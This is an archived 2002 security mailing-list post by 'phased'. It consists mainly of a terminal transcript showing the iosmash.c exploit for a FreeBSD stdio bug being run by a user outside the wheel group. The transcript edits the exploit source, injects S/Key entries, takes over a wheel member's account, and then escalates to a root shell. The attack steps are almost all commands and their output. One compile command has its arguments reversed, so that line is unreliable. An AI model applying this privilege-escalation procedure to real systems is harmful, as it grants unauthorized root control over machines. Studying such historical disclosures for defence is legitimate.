full info on iosmash.c as non wheel user

From: John Scimone (jscimoneat_private)
Date: Tue Apr 23 2002 - 15:25:36 PDT

Next message: Pavel Kankovsky: "Re: /lib/ld-2.2.4.so"

Previous message: Chris: "Rodopi Security/Functionality"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

from phased....

I didnt think such would be necessary but due to the high volume of emails it
has proved so, below is a transcript of exploiting the stdio bug on freebsd as 
a user not in the wheel group

Welcome to FreeBSD!
> id
uid=1000(d0tslash) gid=1000(d0tslash) groups=1000(d0tslash)
>
> grep wheel /etc/group
wheel:*:0:root,akt0r-root,misterx
>
> perl -pi -e 's/root /misterx /g' iosmash.c
> gcc -o iosmash.c iosmash
>./iosmash
Adding d0tslash:
<--- HIT CTRL-C --->
> grep 98 iosmash.c
  s/key 98 snosoft2
  98: MASS OAT ROLL TOOL AGO CAM
        "\nmisterx 0099 snosoft2        6f648e8bd0e2988a     Apr 23,2666
01:02:0
3\n");
> su misterx
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
%pwd
/usr/home/d0tslash
%id
uid=1001(misterx) gid=1001(misterx) groups=1001(misterx), 0(wheel),
1006(cvsusers)
%cd ~
%grep "root " iosmash.c
  decided to make a trivial exploit to easily get root :)
        "\nroot 0099 snosoft2   6f648e8bd0e2988a     Apr 23,2666 01:02:03\n");
%gcc -o iosmash iosmash.c
%./iosmash
Updating misterx:
Old key: snosoft2
<--- HIT CTRL-C --->
%su
s/key 98 snosoft2
Password:MASS OAT ROLL TOOL AGO CAM
xes#

Next message: Pavel Kankovsky: "Re: /lib/ld-2.2.4.so"
Previous message: Chris: "Rodopi Security/Functionality"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Apr 24 2002 - 13:59:22 PDT